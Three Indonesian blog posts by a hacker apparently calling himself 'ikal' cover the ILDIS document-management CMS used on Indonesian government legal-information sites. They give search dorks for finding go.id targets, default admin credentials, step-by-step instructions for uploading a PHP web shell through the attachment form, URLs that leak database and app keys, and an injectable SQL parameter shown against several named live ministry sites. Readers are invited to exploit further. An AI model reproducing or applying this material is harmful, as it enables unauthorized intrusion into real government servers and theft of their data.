-

Hai sobat

Saya ikal, 

Disini saya akan sharing sesuatu nih. 

-

Kali ini kita akan membahas mengenai ildis lagi nih :D, kali ini di ildis v1 yah. ildis v1 sendiri di build di Bono Framework, dan saya sempat menemukan Vulnerability SQL Injection disana,  but i can't inject this site :D, ga tau itu type apa. 

So kali ini kita akan bahas default u/p nya.

Bahan :

- Dork : site:jdih.*.go.id

            site:jdih.*.*.go.id

            site:jdih.dprd.*.go.id

            site:jdih-dprd.*.go.id

- Login page : 

https://localhost/index.php/login

https://localhost/[path]/index.php/login

- Username : admin

- Password  : password

Login Page

/*\Login menggunakan username dan password diatas, dan jika vuln kalian akan dibawa kedalam dashboard admin.

Dashboard page

/*\Klik garis tiga di pojok kanan atas.

/*\Klik Dokumen.

/*\Klik Create. 

/*\Klik Lampiran. 

/*\Klik Tambah. 

/*\Upload shell kalian diform upload tersebut yah :D. Dan untuk akses shellnya di directory berikut. 

https://localhost/storage/document/shell.php

https://localhost/[path]/storage/document/shell.php

Thanks

See U. 

 

-

Hai sobat

Saya ikal, 

Disini saya akan sharing - sharing nih. 

-

Disini saya akan mempublish vulnerability di WebApp ildis v2. Kalau kemarin kita bahas yang v1,sekarang kita bahas yang v2 yah. 

Vulnerability ILDIS v1 :

https://www.draxploit.web.id/2021/01/ildis-unauthenticated-sql-injection-and.html

Berbeda dengan ILDIS v1 yang memiliki tampilan lebih simple dan elegan, di ILDIS v2 ini lebih ramai tampilan indexnya, dan agak kurang mobile friendly (cacat saat ditampilkan di HandPhone).

Okeh langsung saja,  untuk information disclosurenya lumayan berguna jika kita tidak dapat login melalui Default username/passwordnya :D,  karena kita bisa disuguhkan db,smtp,appkey,pathroot.

- Dork : "ILDIS" site:go.id

               inurl:?tipe_dokumen= site:go.id

               inurl:/data_dokumen site:go.id

1.Information Disclosure. 

Letak bugnya di

https://localhost/pencarian/HaikalGanteng/detail

https://localhost/[path]/pencarian/HaikalGanteng/detail

https://localhost/pencarian?q[]=A

https://localhost/[path]/pencarian?q[]=A

For upload your shell : Copy App_Key -> Upload your shell using RCE. 

2.Default u/p.

- login page : 

https://localhost/login

https://localhost/[path]/login

- username,password

U : admin

P : admin123

Admin Login

Dashboard Page

For upload your shell : login -> Dokumen -> Tambah/Sunting -> Lampiran -> Upload Your Shell. 

Thanks

See U

 

-

Hai sobat

Saya ikal,

Disini saya akan share sesuatu nih.

-

Kali ini kita akan membahas sebuah vulnerability di sebuah WebApp semacam CMS dengan nama ILDIS (Indonesian Legal Documentation dan Information System). Jenis Vulnerability nya adalah SQL Injection,dan Information Disclosure.

Dan perlu dibaca untuk yang satu ini, WebApp ILDIS Ini sudah dipakai di 100 lebih website pemerintahan negara indonesia :D. Vulnerabilitynya sendiri saya temukan kemarin, sejak saya menemukan WebApp ILDIS v2,dan saya memutuskan untuk mencari tau apa itu ILDIS :D.

Apa itu ILDIS?

https://jabar.kemenkumham.go.id/berita-kanwil/berita-utama/aplikasi-standar-jdih-ildis-percepat-integrasi-basis-data-dokumen-hukum-nasional

Okeh disini saya hanya memberi Dork,dan letak Vulnerabilitynya saja. Jika kalian ingin mengeksekusi lebih jauh, silakan saja :D.

Bahan : 

- Dork : "ILDIS" site:go.id

               inurl:?jenis_peraturan= site:go.id

               inurl:/index.php/web/result?

- Vulnerable parameter : skip=[value][SQL Query]

- Admin Login : 

https://localhost/index.php/login

https://localhost/[path]/index.php/login

Example : 

https://jdih.bkn.go.id/ildis/www/index.php/web/result?&skip=2410'

https://jdih.kemlu.go.id/ildis/www/index.php/web/result?&skip=10'

https://jdih.balitbangham.go.id/ildis/www/index.php/web/result?&skip=1'

https://jdih.kemsos.go.id/pencarian/www/index.php/web/result?&skip=1'

Sebenarnya masih banyak lagi website nya :D, kalian cari sendiri saja menggunakan dork diatas yah.

Thanks

See U